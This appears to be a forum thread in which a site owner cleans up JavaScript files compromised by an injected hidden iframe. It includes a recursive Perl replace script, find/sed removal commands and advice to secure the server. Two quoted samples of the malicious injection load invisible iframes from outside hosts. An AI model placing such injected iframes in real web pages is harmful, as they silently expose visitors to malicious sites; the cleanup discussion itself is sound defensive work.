A man keeps breaking into my house and taking a crap in my toilet and then leaving without flushing. How can I use Perl to automate flushing the toilet?

Hey, how about instead of automating flushing the toilet I figure out how he's getting into the house in the first place and try to stop that happening?

shajiindia,

IMHO, you should be doing something to fix the problem;

Why are you letting someone modify your live web-site?

Check the logs, close the exposure holes, etc. Then fix the code and don't let it happen again.

I've been hacked, and it isn't fun, but I fixed the source of the problem.

First, all of your JavaScript files should be read-only. Look at everything, since there may be other compromised files.

To answer your question, a very simple Perl script run every hour could check the modified JS to a checksum and if it fails to verify, then notify the sysadmin. But if the site is that un-secure, then maybe *they* could modify your Perl script!

Good Luck...Ed

Thanks for your help.

The first time you reported this happening I suggested you secure the system and restore the site from backup. At the time you had no backup, clearly you've not learned anything from the first attack.

You're wasting your time if the system isn't secured by someone who knows what they're doing. This probably isn't you.

After you've fixed your security problems, just reload the scripts from version control :) (You are using version control aren't you?)

I am burning the midnight oil to fix it. Thanks for your kind help. It is greatly appreciated.

Here is the code I am working on. It works for sample data, but for the actual data, it is not working. I am working on the backup of the live files and presently using the following script. I am working on Active Perl 5.14 on Windows. Please help.

#!/usr/bin/perl

use strict;
 
# show no warnings about recursion (we know what we do  )
no warnings "recursion";
 
# specify the file you search here (in this example "corporate" ) :
my $file = '\.js$';
my @jsfiles = ();
 
# specify the directory where you want to start the search (in this ex
+ample ".", the current directory) :
my $searchdir = "C:/scripts/corporate";
my $replace_string = "SAMPLE TEXT TO REPLACE";
 
# Calling the Subroutine, which searches the File
readDirectory($searchdir, $file);

print "\n", '*' x 60, "\n";
foreach my $js (@jsfiles) {

    open JAVASCRIPT, '<', "$js" or die "Cannot open file for read ($!)
+";
    open TEMP, '>', "temp.js" or die "Cannot open file for write ($!)"
+;
    #Enable slurp mode
    local $/;
    my $data = <JAVASCRIPT>;
    $data =~ s/$replace_string//g;
    print TEMP $data;
    close JAVASCRIPT;
    close TEMP;
    unlink $js;
    rename "temp.js", $js;
    print "$js\n";
}
print "\n", '*' x 60, "\n";
 
# We need an Subroutine, which can be called on every sub-directory
sub readDirectory
{
     my $searchdir = shift;
     my $searchfile = shift;
 
     # a little bit output, in which directory the script
     # is searching at the moment (the following line is not necessary
+)
     print "Searching in $searchdir \n";
 
     # Open and close the directory
     opendir DIR, $searchdir or die("An error occured: $!");
     my @files = readdir(DIR);
     closedir DIR;
 
     foreach my $currentFile (@files)
     {
          # In Unix/Linux we have the directorys "." and "..",
          # it's no good idea to scan these, so let them skip.
          next if $currentFile =~ /^\./;
 
          # Lets have a look, if the current "file" is the searched fi
+le,
          # else have a look, if the "file" is an directory,
          # and if its one, lets have a look, if the searched file is 
+into it.
          if ( $currentFile =~ /$searchfile/ )
          {
               # We found the right file, now we can do somthing with 
+it,
               # in this case, we only print a text
               push @jsfiles, "$searchdir/$currentFile";
               print "Found the file: $searchdir/$currentFile\n";
          }
          if ( -d "$searchdir/$currentFile" )
          {
               # The Subroutine i calling hisself with the new paramet
+ers
               readDirectory("$searchdir/$currentFile", $searchfile);
          }
     }
}
[download]

Here is a code signature of the hacked .js files

;document.write('<iframe width="50" height="50" style="width:100px;hei
+ght:100px;position:absolute;left:-100px;top:0;" src="http : / / ipxlq
+fn . freewww . info / 9a06efb5c 8163b982c1 1a64762e27 d . cgi ? 8"></
+iframe>');
[download]

I want to make the above code to get replaced instead of the sample pattern.

hello all I faced exactly the same problem: I think there is a problem with my hoster -- not from my ftp access for sure ...

The code has infecteed all my JS files on my server (I have 1000 + Js files)

To remove the bad code from the js I did the following (shell command line):

1) list all the infected files find . -name "*.js" -exec grep -l -E 'iframe' {} \; > file_js.txt Wich means : find all the javascript file below my directory and search in it all string iframe put all the selected files file_js.txt document

2) open one of the selected files in 1 go to the bottom of the file and verified that you have this type of Iframe code : document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/235e4e002c.pjH7gYIk?default" height="55" width="55"></iframe>');

3) remove this code in all files -- the magic command line (test it before on one or to copied files...) find . -name "*.js" -type f -exec sed -i -e "s/document.write.*wikaba.*//g" {} \; which means find all Js files below my directory, then replace inside these files the string beginning by "document.write" having multiple caracters then having the string "wikaba" then finishing by many other caracters. You replace it by nothing .

And that do the trick ! Hope it could help

Unless you fix the root cause of the problem you'll likely be hit again, as was the case with this user.